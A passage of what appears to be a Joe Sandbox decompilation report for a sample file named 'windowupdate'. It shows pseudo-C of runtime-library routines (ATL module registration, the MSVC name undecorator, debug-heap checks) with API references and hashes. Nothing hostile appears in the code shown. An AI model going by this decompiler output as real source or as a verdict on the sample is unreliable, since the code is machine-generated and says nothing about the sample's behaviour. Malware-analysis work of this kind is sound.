                      														_t169 = E00DC1520(_t168, _t278 - _t278);
                      														__eflags = _t169;
                      														if(_t169 != 0) {
                      															_t274 = _t278;
                      															_t251 = _v12;
                      															_t172 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x14))))(_t251, "MODULETYPE", "LocalServer32");
                      															__eflags = _t278 - _t278;
                      															_v328 = E00DC1520(_t172, _t278 - _t278);
                      														} else {
                      															_t274 = _t278;
                      															_t251 =  *((intOrPtr*)( *_v12 + 0x14));
                      															_t184 =  *_t251(_v12, "MODULETYPE", "InprocServer32");
                      															__eflags = _t278 - _t278;
                      															_v328 = E00DC1520(_t184, _t278 - _t278);
                      														}
                      														__eflags = _v328;
                      														if(_v328 >= 0) {
                      															_t274 = _t278;
                      															_t261 =  *0xf215ec; // 0xf236c0
                      															_t251 =  *((intOrPtr*)( *_t261 + 0x14));
                      															_t181 =  *_t251(_v12);
                      															__eflags = _t278 - _t278;
                      															_v328 = E00DC1520(_t181, _t278 - _t278);
                      														}
                      														_v1004 = _v328;
                      														E00D3F220( &_v44);
                      														_t176 = _v1004;
                      													} else {
                      														_t251 = _v328;
                      														_v1000 = _t251;
                      														E00D3F220( &_v44);
                      														_t176 = _v1000;
                      													}
                      													goto L37;
                      												}
                      												_t188 = E00D31900(__eflags, _v20);
                      												_t278 = _t278 + 4;
                      												__eflags = _t188 & 0x000000ff;
                      												if(__eflags == 0) {
                      													goto L21;
                      												}
                      												_v1028 =  &(_v20[0x24]);
                      												E00DBF1D0(_v1028);
                      												_v1032 = _t278;
                      												E00DC13A0(_v1032, _v1028,  &_v1012);
                      												_v1032 = _v1032 + 0x20;
                      												_v1036 = _v1032;
                      												goto L22;
                      											}
                      											_v1024 = 0;
                      											goto L23;
                      										}
                      										_v1020 = 0;
                      										goto L24;
                      									}
                      									_v996 = _v328;
                      									E00D3F220( &_v44);
                      									_t176 = _v996;
                      									goto L37;
                      								}
                      								_t251 = _v328;
                      								_v992 = _t251;
                      								E00D3F220( &_v44);
                      								_t176 = _v992;
                      								goto L37;
                      							}
                      							_t251 = _v328;
                      							_v988 = _t251;
                      							E00D3F220( &_v44);
                      							_t176 = _v988;
                      							goto L37;
                      						}
                      						_t269 = _t278;
                      						_t196 = GetModuleHandleA(0);
                      						__eflags = _t278 - _t278;
                      						_t197 = E00DC1520(_t196, _t278 - _t278);
                      						__eflags = _v320 - _t197;
                      						if(_v320 != _t197) {
                      							_t274 = _t278;
                      							_t200 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x14))))(_v12, "Module",  &_v312);
                      							__eflags = _t278 - _t278;
                      							_v328 = E00DC1520(_t200, _t278 - _t278);
                      							goto L8;
                      						}
                      						goto L6;
                      					}
                      					_v984 = E00D31710(_t213, 0x7a);
                      					E00D3F220( &_v44);
                      					_t176 = _v984;
                      					goto L37;
                      				} else {
                      					_v980 = E00D32DC0(_t213, _t269);
                      					E00D3F220( &_v44);
                      					_t176 = _v980;
                      					L37:
                      					E00DC13E0(_t206, _t276, 0xd37b50, _v1012);
                      					_t178 = _t176;
                      					_t260 = _t251;
                      					return E00D47280(_t178, _t206, _v8 ^ _t276, _t260, _t268, _t274);
                      				}
                      			}

                      APIs
                      • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00D376C0
                      • _HRESULT_FROM_WIN32.LIBCMTD ref: 00D3770A
                        • Part of subcall function 00D32DC0: GetLastError.KERNEL32 ref: 00D32DCE
                        • Part of subcall function 00D32DC0: _HRESULT_FROM_WIN32.LIBCMTD ref: 00D32DE2
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ErrorFileLastModuleName
                      • String ID: $%ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h$InprocServer32$LocalServer32$MODULEGUID$MODULETYPE$Module$Module_Raw$pszModuleGUID != 0
                      • API String ID: 2776309574-3582396993
                      • Opcode ID: c69e4625e8d707eb8ac01452a8645c5ae998af144fce9a1e49cfc221b3230882
                      • Instruction ID: fae337fe95ac87bc6fa8312475e5e7bb0e2c13333d62718aeee77b70b0b8553a
                      • Opcode Fuzzy Hash: c69e4625e8d707eb8ac01452a8645c5ae998af144fce9a1e49cfc221b3230882
                      • Instruction Fuzzy Hash: D6E109B6D002299FCB24EF54DC86BEEB7B4EB48340F0441A9E549A7291D7709E85CFB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D54C20(intOrPtr __edx, intOrPtr _a4) {
                      				signed int _v8;
                      				char _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				signed int _v32;
                      				char _v36;
                      				char _v44;
                      				intOrPtr _v48;
                      				char _v52;
                      				intOrPtr _v56;
                      				char _v60;
                      				char* _v64;
                      				char _v68;
                      				char* _v72;
                      				char _v76;
                      				char* _v80;
                      				char _v84;
                      				char* _v88;
                      				char _v92;
                      				char* _v96;
                      				char _v100;
                      				char _v108;
                      				char _v116;
                      				char _v124;
                      				char _v132;
                      				char _v140;
                      				char* _t62;
                      				intOrPtr _t66;
                      				intOrPtr _t75;
                      				char* _t91;
                      				char* _t92;
                      				char* _t97;
                      				intOrPtr _t104;
                      				signed int _t110;
                      				void* _t112;
                      
                      				_t104 = __edx;
                      				_t62 =  *0xf20640; // 0x0
                      				if( *_t62 != 0) {
                      					E00D4F3F0( &_v44);
                      					_t91 =  *0xf20640; // 0x0
                      					if( *_t91 != 0x57) {
                      						if(E00D521A0(_t91) == 0 || E00D52290() != 0) {
                      							_v20 = 0;
                      						} else {
                      							_v20 = 1;
                      						}
                      						_v24 = _v20;
                      					} else {
                      						_v24 = E00D521A0(_t91);
                      					}
                      					if(_v24 == 0) {
                      						_t92 =  *0xf20640; // 0x0
                      						_v36 =  *_t92;
                      						_t66 =  *0xf20640; // 0x0
                      						 *0xf20640 = _t66 + 1;
                      						if(_v36 == 0x57) {
                      							E00D54EA0( &_v132);
                      							_t112 = _t112 + 4;
                      						}
                      						goto L21;
                      					} else {
                      						E00D4F3F0( &_v16);
                      						_t97 =  *0xf20640; // 0x0
                      						_v32 =  *_t97;
                      						_t75 =  *0xf20640; // 0x0
                      						 *0xf20640 = _t75 + 1;
                      						_v8 = _v32;
                      						_t110 = _v8 - 0x54;
                      						_v8 = _t110;
                      						if(_v8 > 5) {
                      							L18:
                      							E00D4F820( &_v44,  &_v16);
                      							L21:
                      							E00D4FD40( &_v44, E00D54E80( &_v140));
                      							E00D4F240(_a4,  &_v44);
                      							return _a4;
                      						}
                      						switch( *((intOrPtr*)(_v8 * 4 +  &M00D54E5C))) {
                      							case 0:
                      								_t80 = E00D50060("union ", 6);
                      								_t112 = _t112 + 8;
                      								_v60 = _t80;
                      								_v56 = _t110;
                      								E00D4F7E0( &_v16,  &_v60);
                      								goto L18;
                      							case 1:
                      								_v68 = E00D50060("struct ", 7);
                      								_v64 = __edx;
                      								__edx =  &_v68;
                      								__ecx =  &_v16;
                      								__eax = E00D4F7E0(__ecx,  &_v68);
                      								goto L18;
                      							case 2:
                      								_v76 = E00D50060("class ", 6);
                      								_v72 = __edx;
                      								__eax =  &_v76;
                      								__ecx =  &_v16;
                      								__eax = E00D4F7E0(__ecx,  &_v76);
                      								goto L18;
                      							case 3:
                      								_v100 = E00D50060("enum ", 5);
                      								_v96 = __edx;
                      								 &_v116 = E00D54EA0( &_v116);
                      								__ecx =  &_v100;
                      								__edx =  &_v124;
                      								__eax = E00D4FAA0( &_v124,  &_v100, __eax);
                      								__ecx =  &_v16;
                      								__eax = E00D4F820(__ecx, __eax);
                      								goto L18;
                      							case 4:
                      								_v84 = E00D50060("coclass ", 8);
                      								_v80 = __edx;
                      								__ecx =  &_v84;
                      								__ecx =  &_v16;
                      								__eax = E00D4F7E0(__ecx,  &_v84);
                      								goto L18;
                      							case 5:
                      								_v92 = E00D50060("cointerface ", 0xc);
                      								_v88 = __edx;
                      								__edx =  &_v92;
                      								__ecx =  &_v16;
                      								__eax = E00D4F7E0(__ecx,  &_v92);
                      								goto L18;
                      						}
                      					}
                      				}
                      				_v52 = E00D50060("`unknown ecsu\'", 0xe);
                      				_v48 = _t104;
                      				_v28 = E00D4F1F0( &_v108,  &_v52);
                      				E00D4FC30(_v28, _a4, 1);
                      				return _a4;
                      			}

                      APIs
                      • DName::operator+.LIBCMTD ref: 00D54C62
                        • Part of subcall function 00D4FC30: Mailbox.LIBCMTD ref: 00D4FC40
                        • Part of subcall function 00D4FC30: DName::operator+=.LIBCMTD ref: 00D4FC4C
                        • Part of subcall function 00D4FC30: Mailbox.LIBCMTD ref: 00D4FC58
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D54C72
                      • UnDecorator::doEcsu.LIBCMTD ref: 00D54C85
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D54CC4
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Iterator_baseIterator_base::_Mailboxstd::_$Decorator::doEcsuName::operator+Name::operator+=
                      • String ID: W$`unknown ecsu'$class $coclass $cointerface $enum $struct $union
                      • API String ID: 4208403871-962625158
                      • Opcode ID: 9ab19150234d236ea2ef6371566c6bd3b576d92e75a367076070955b3fa983b7
                      • Instruction ID: 37cc25e7fa887725b423d8235c5c9b6a6e1fe00441c3152c9d0015e6c8ea28cc
                      • Opcode Fuzzy Hash: 9ab19150234d236ea2ef6371566c6bd3b576d92e75a367076070955b3fa983b7
                      • Instruction Fuzzy Hash: 0A6120B5D40218DBDF14EFA4DC52AEEBBB4FF54305F14412AEC1666292EB305648CB72
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D55060(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8, char* _a12, intOrPtr _a16) {
                      				char _v8;
                      				intOrPtr _v12;
                      				char _v20;
                      				char _v28;
                      				char _v36;
                      				char _v44;
                      				char _v52;
                      				intOrPtr _t51;
                      				intOrPtr _t61;
                      				char* _t63;
                      				intOrPtr _t66;
                      				intOrPtr _t81;
                      				intOrPtr* _t92;
                      				intOrPtr _t97;
                      				char* _t104;
                      				intOrPtr _t105;
                      				char* _t109;
                      				intOrPtr _t116;
                      				intOrPtr _t125;
                      				intOrPtr _t136;
                      				char* _t139;
                      
                      				E00D4F3F0( &_v20);
                      				_t51 =  *0xf20640; // 0x0
                      				 *0xf20640 = _t51 + 1;
                      				_t92 =  *0xf20640; // 0x0
                      				_v8 =  *_t92;
                      				if(_v8 == 0x41) {
                      					L4:
                      					if(_a16 == 0) {
                      						if( *_a8 == 2 ||  *_a8 == 3) {
                      							 *_a8 = 5;
                      						} else {
                      							if( *_a8 == 1) {
                      								 *_a8 = 4;
                      							}
                      						}
                      					}
                      					_t125 =  *0xf20640; // 0x0
                      					 *0xf20640 = _t125 + 1;
                      					L29:
                      					E00D4F3F0(_a4);
                      					return _a4;
                      				}
                      				if(_v8 == 0x42) {
                      					if(_a16 == 0) {
                      						 *_a12 = 1;
                      						E00D4F850( &_v20, 0x3e);
                      						_t97 =  *0xf20640; // 0x0
                      						 *0xf20640 = _t97 + 1;
                      						goto L29;
                      					}
                      					E00D4F350(_a4, 2);
                      					return _a4;
                      				}
                      				if(_v8 == 0x43) {
                      					 *_a8 = 5;
                      					_t61 =  *0xf20640; // 0x0
                      					 *0xf20640 = _t61 + 1;
                      					goto L29;
                      				}
                      				_t63 =  *0xf20640; // 0x0
                      				if( *_t63 == 0) {
                      					L17:
                      					E00D4F350(_a4, 1);
                      					return _a4;
                      				} else {
                      					_t66 =  *0xf20640; // 0x0
                      					if( *((char*)(_t66 + (1 << 0))) != 0) {
                      						if(_a16 == 0) {
                      							_t104 =  *0xf20640; // 0x0
                      							_t105 =  *0xf20640; // 0x0
                      							_t28 =  *((char*)(_t105 + (1 << 0))) - 0x30; // -95
                      							_v12 = ( *_t104 - 0x30 << 4) + _t28;
                      							_t136 =  *0xf20640; // 0x0
                      							 *0xf20640 = _t136 + 2;
                      							if(_v12 > 1) {
                      								E00D4F850( &_v20, 0x2c);
                      								E00D4F820( &_v20, E00D4FB70( &_v20,  &_v36, E00D4F510(__ebx,  &_v28, __edi, __esi, _v12, 0)));
                      							}
                      							E00D4F820( &_v20, E00D4FBB0( &_v20,  &_v44, 0x3e));
                      							_t109 =  *0xf20640; // 0x0
                      							if( *_t109 != 0x24) {
                      								E00D4F820( &_v20, E00D4FBB0( &_v20,  &_v52, 0x5e));
                      							} else {
                      								_t81 =  *0xf20640; // 0x0
                      								 *0xf20640 = _t81 + 1;
                      							}
                      							_t139 =  *0xf20640; // 0x0
                      							if( *_t139 == 0) {
                      								E00D4FF10( &_v20, 1);
                      							} else {
                      								_t116 =  *0xf20640; // 0x0
                      								 *0xf20640 = _t116 + 1;
                      							}
                      							E00D5AAA0( &_v20);
                      							E00D4F240(_a4,  &_v20);
                      							return _a4;
                      						}
                      						E00D4F350(_a4, 2);
                      						return _a4;
                      					}
                      					goto L17;
                      				}
                      				goto L4;
                      			}

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D55069
                      • DName::DName.LIBVCRUNTIMED ref: 00D550F2
                      • DName::DName.LIBVCRUNTIMED ref: 00D5516D
                      • DName::DName.LIBVCRUNTIMED ref: 00D55185
                      • DName::DName.LIBVCRUNTIMED ref: 00D551EC
                        • Part of subcall function 00D4F510: __aullrem.LIBCMT ref: 00D4F557
                        • Part of subcall function 00D4F510: __aulldiv.LIBCMT ref: 00D4F570
                      • DName::operator+.LIBCMTD ref: 00D551F9
                        • Part of subcall function 00D4FB70: Mailbox.LIBCMTD ref: 00D4FB80
                        • Part of subcall function 00D4FB70: Mailbox.LIBCMTD ref: 00D4FB98
                      • Mailbox.LIBCMTD ref: 00D55202
                      • DName::operator+.LIBCMTD ref: 00D55210
                      • Mailbox.LIBCMTD ref: 00D55219
                      • DName::operator+.LIBCMTD ref: 00D55244
                        • Part of subcall function 00D4FBB0: Mailbox.LIBCMTD ref: 00D4FBC0
                        • Part of subcall function 00D4FBB0: DName::operator+=.LIBCMTD ref: 00D4FBCD
                        • Part of subcall function 00D4FBB0: Mailbox.LIBCMTD ref: 00D4FBD9
                      • Mailbox.LIBCMTD ref: 00D5524D
                      • DName::operator+=.LIBCMTD ref: 00D55275
                        • Part of subcall function 00D4FF10: DName::isValid.LIBCMTD ref: 00D4FF1A
                        • Part of subcall function 00D4FF10: DName::isEmpty.LIBCMTD ref: 00D4FF26
                        • Part of subcall function 00D4FF10: DName::operator=.LIBVCRUNTIMED ref: 00D4FF42
                      • DName::setIsComArray.LIBCMTD ref: 00D5527D
                      • Mailbox.LIBCMTD ref: 00D55289
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D55296
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Mailbox$NameName::$Name::operator+$Iterator_baseIterator_base::_Name::isName::operator+=std::_$ArrayEmptyName::operator=Name::setValid__aulldiv__aullrem
                      • String ID: C
                      • API String ID: 961569035-1037565863
                      • Opcode ID: 7c634ea984aa10362437d32465375f78e20ce4d463890a2f190b614546666df9
                      • Instruction ID: 391c012d547bb86d1f01dc9e5161d7e1eb16386e20199d9101ae3ce00793784b
                      • Opcode Fuzzy Hash: 7c634ea984aa10362437d32465375f78e20ce4d463890a2f190b614546666df9
                      • Instruction Fuzzy Hash: D561BE71900519DBEF29CF54DCA1BBE7B71FF81305F144028EC065B2A6CB71AA45DBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D525F0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                      				char _v8;
                      				char _v12;
                      				char* _v16;
                      				char* _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				char _v36;
                      				intOrPtr _v40;
                      				char _v44;
                      				intOrPtr _v48;
                      				char _v52;
                      				intOrPtr _v56;
                      				char _v60;
                      				intOrPtr _v64;
                      				char _v68;
                      				intOrPtr _v72;
                      				char _v76;
                      				intOrPtr* _t53;
                      				void* _t57;
                      				void* _t75;
                      				intOrPtr _t86;
                      				intOrPtr* _t93;
                      				intOrPtr _t95;
                      				intOrPtr _t98;
                      				intOrPtr _t103;
                      				intOrPtr _t105;
                      				intOrPtr _t106;
                      				char _t108;
                      
                      				_t53 =  *0xf20640; // 0x0
                      				_t85 =  *_t53;
                      				_v12 =  *_t53;
                      				if(_v12 == 0x58) {
                      					_t86 =  *0xf20640; // 0x0
                      					 *0xf20640 = _t86 + 1;
                      					_v60 = E00D50060("void", 4);
                      					_v56 = _t103;
                      					E00D4F1F0(_a4,  &_v60);
                      					return _a4;
                      				}
                      				_t122 = _v12 - 0x5a;
                      				if(_v12 == 0x5a) {
                      					L3:
                      					_t105 =  *0xf20640; // 0x0
                      					_t106 = _t105 + 1;
                      					 *0xf20640 = _t106;
                      					_t57 = E00D521D0(_t85);
                      					__eflags = _t57;
                      					if(_t57 == 0) {
                      						_v52 = E00D50060("<ellipsis>", 0xa);
                      						_v48 = _t106;
                      						_v16 =  &_v52;
                      					} else {
                      						_v44 = E00D50060("...", 3);
                      						_v40 = _t106;
                      						_v16 =  &_v44;
                      					}
                      					_v24 = _v16;
                      					E00D4F1F0(_a4, _v24);
                      					return _a4;
                      				}
                      				E00D524A0(__ebx, __edi, __esi, _t122,  &_v36);
                      				if(E00D5AB70( &_v36) != 0) {
                      					E00D4F240(_a4,  &_v36);
                      					return _a4;
                      				} else {
                      					_t93 =  *0xf20640; // 0x0
                      					_t108 =  *_t93;
                      					_v8 = _t108;
                      					if(_v8 == 0) {
                      						E00D4F240(_a4,  &_v36);
                      						return _a4;
                      					}
                      					if(_v8 == 0x40) {
                      						_t95 =  *0xf20640; // 0x0
                      						 *0xf20640 = _t95 + 1;
                      						E00D4F240(_a4,  &_v36);
                      						return _a4;
                      					}
                      					if(_v8 == 0x5a) {
                      						_t98 =  *0xf20640; // 0x0
                      						 *0xf20640 = _t98 + 1;
                      						_t75 = E00D521D0(_t98 + 1);
                      						__eflags = _t75;
                      						if(_t75 == 0) {
                      							_v76 = E00D50060(",<ellipsis>", 0xb);
                      							_v72 = _t108;
                      							_v20 =  &_v76;
                      						} else {
                      							_v68 = E00D50060(",...", 4);
                      							_v64 = _t108;
                      							_v20 =  &_v68;
                      						}
                      						_v28 = _v20;
                      						E00D4FB30( &_v36, _a4, _v28);
                      						return _a4;
                      					}
                      					E00D4F350(_a4, 2);
                      					return _a4;
                      				}
                      				goto L3;
                      			}

                      APIs
                      • UnDecorator::doEllipsis.LIBCMTD ref: 00D52620
                      • UnDecorator::getArgumentList.LIBCMTD ref: 00D526B7
                        • Part of subcall function 00D524A0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D524B0
                        • Part of subcall function 00D524A0: DName::operator+=.LIBCMTD ref: 00D524FC
                        • Part of subcall function 00D524A0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D52561
                        • Part of subcall function 00D524A0: Replicator::isFull.LIBCMTD ref: 00D52587
                        • Part of subcall function 00D524A0: Replicator::operator+=.LIBCMTD ref: 00D5259A
                        • Part of subcall function 00D524A0: DName::operator=.LIBVCRUNTIMED ref: 00D525BB
                        • Part of subcall function 00D524A0: DName::operator+=.LIBCMTD ref: 00D525C7
                        • Part of subcall function 00D524A0: Mailbox.LIBCMTD ref: 00D525DA
                      • Mailbox.LIBCMTD ref: 00D526FC
                      • UnDecorator::doEllipsis.LIBCMTD ref: 00D52718
                      • DName::operator+.LIBCMTD ref: 00D5276A
                      • Mailbox.LIBCMTD ref: 00D5278A
                      • DName::DName.LIBVCRUNTIMED ref: 00D52799
                        • Part of subcall function 00D4F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F3AE
                      • Mailbox.LIBCMTD ref: 00D527AC
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Mailbox$Decorator::doEllipsisIterator_baseIterator_base::_NameName::operator+=std::_$ArgumentDecorator::getFullListName::Name::operator+Name::operator=Node::makeReplicator::isReplicator::operator+=Status
                      • String ID: ,...$,<ellipsis>$...$<ellipsis>$Z$Z$void
                      • API String ID: 3869916097-1416550716
                      • Opcode ID: d45f13f55c9d9c0bc7e816397d964a5c63721c476a3a3917f527838cb8d2e0dd
                      • Instruction ID: 5e8ba693350692b1228e4e4e5c572f08e51a513cbc66bd85687e745080fe87f5
                      • Opcode Fuzzy Hash: d45f13f55c9d9c0bc7e816397d964a5c63721c476a3a3917f527838cb8d2e0dd
                      • Instruction Fuzzy Hash: D9512DB5D00208EBDF14DF98D891AED7BB0BF49305F144059ED05A7252EB70AA4DDBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 83%
                      			E00D87560(void* __edi, intOrPtr _a4, signed int* _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
                      				signed int _v5;
                      				void* _v6;
                      				signed int* _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				intOrPtr _v32;
                      				signed int _v36;
                      				signed int _t131;
                      				signed char _t132;
                      				signed int _t135;
                      				intOrPtr _t136;
                      				intOrPtr _t137;
                      				signed int* _t141;
                      				intOrPtr _t142;
                      				intOrPtr _t145;
                      				signed int* _t153;
                      				signed int _t157;
                      				void* _t158;
                      				void* _t160;
                      				void* _t162;
                      				intOrPtr _t169;
                      				signed int _t171;
                      				signed int* _t176;
                      				void* _t180;
                      				void* _t184;
                      				void* _t185;
                      				void* _t186;
                      				void* _t191;
                      				void* _t192;
                      				signed int _t195;
                      				signed int _t197;
                      				void* _t198;
                      				void* _t200;
                      				signed int _t209;
                      				signed int _t213;
                      				signed int _t221;
                      				intOrPtr _t232;
                      				intOrPtr _t234;
                      				signed int* _t253;
                      				signed int _t257;
                      				signed int _t259;
                      				intOrPtr _t272;
                      				signed int _t275;
                      				signed int _t276;
                      				void* _t288;
                      				void* _t289;
                      				void* _t290;
                      				void* _t291;
                      				void* _t292;
                      				void* _t293;
                      				void* _t294;
                      				void* _t295;
                      
                      				_t288 = __edi;
                      				if(_a4 == 0) {
                      					return E00D89580( *_a8, _a12, _a16, _a20);
                      				}
                      				__eflags = _a24 & 0x000000ff;
                      				if((_a24 & 0x000000ff) == 0) {
                      					L5:
                      					L00D87AE0();
                      					_t131 =  *0xdf6058; // 0x34
                      					_v24 = _t131;
                      					__eflags =  *0xdf6060 - 0xffffffff;
                      					if( *0xdf6060 != 0xffffffff) {
                      						__eflags = _v24 -  *0xdf6060; // 0xffffffff
                      						if(__eflags == 0) {
                      							asm("int3");
                      						}
                      					}
                      					__eflags =  *0xdf6244;
                      					if( *0xdf6244 == 0) {
                      						L17:
                      						__eflags = _a12 - 1;
                      						if(_a12 == 1) {
                      							L27:
                      							_t132 = E00D87360(_t207, _a4);
                      							_t290 = _t289 + 4;
                      							__eflags = _t132 & 0x000000ff;
                      							if(__eflags == 0) {
                      								L31:
                      								_t135 = L00D880B0(_a4);
                      								_t291 = _t290 + 4;
                      								__eflags = _t135;
                      								if(__eflags == 0) {
                      									_t185 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\debug_heap.cpp", 0x25c, 0, L"%ls", L"_CrtIsValidHeapPointer(block)");
                      									_t291 = _t291 + 0x18;
                      									__eflags = _t185 - 1;
                      									if(_t185 == 1) {
                      										asm("int3");
                      									}
                      								}
                      								_t136 = E00D86E40(_a4);
                      								_t292 = _t291 + 4;
                      								_v16 = _t136;
                      								_t137 = _v16;
                      								__eflags =  *((intOrPtr*)(_t137 + 0x10)) - 3;
                      								if( *((intOrPtr*)(_t137 + 0x10)) != 3) {
                      									_v6 = 0;
                      								} else {
                      									_v6 = 1;
                      								}
                      								_v5 = _v6;
                      								__eflags = _v5 & 0x000000ff;
                      								if((_v5 & 0x000000ff) == 0) {
                      									_t209 =  *0xf206ec; // 0x3329
                      									__eflags = _t209 -  *((intOrPtr*)(_v16 + 0x14));
                      									if(__eflags >= 0) {
                      										goto L47;
                      									}
                      									_t180 = L00D848E0(__eflags, 1, 0, 0, 0, "Error: possible heap corruption at or near 0x%p", _a4);
                      									__eflags = _t180 - 1;
                      									if(_t180 == 1) {
                      										asm("int3");
                      									}
                      									 *((intOrPtr*)(L00D82F70(_t209))) = 0x16;
                      									return 0;
                      								} else {
                      									__eflags =  *((intOrPtr*)(_v16 + 0xc)) - 0xfedcbabc;
                      									if(__eflags != 0) {
                      										L40:
                      										_t184 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\debug_heap.cpp", 0x263, 0, L"%ls", L"old_head->_line_number == line_number_for_ignore_blocks && old_head->_request_number == request_number_for_ignore_blocks");
                      										_t292 = _t292 + 0x18;
                      										__eflags = _t184 - 1;
                      										if(_t184 == 1) {
                      											asm("int3");
                      										}
                      										L42:
                      										L47:
                      										_t210 = _a8;
                      										__eflags =  *_a8 - 0xffffffbc;
                      										if( *_a8 <= 0xffffffbc) {
                      											_v32 =  *_a8 + 0x24;
                      											_v12 = 0;
                      											_t211 = _a24 & 0x000000ff;
                      											__eflags = _a24 & 0x000000ff;
                      											if((_a24 & 0x000000ff) == 0) {
                      												_t141 = E00D9CA20(_v32, _v16, _v32);
                      												_t293 = _t292 + 8;
                      												_v12 = _t141;
                      												__eflags = _v12;
                      												if(_v12 != 0) {
                      													L55:
                      													_t142 =  *0xdf6058; // 0x34
                      													 *0xdf6058 = _t142 + 1;
                      													_t213 = _v5 & 0x000000ff;
                      													__eflags = _t213;
                      													if(_t213 == 0) {
                      														__eflags =  *0xf206ec - 0xffffffff;
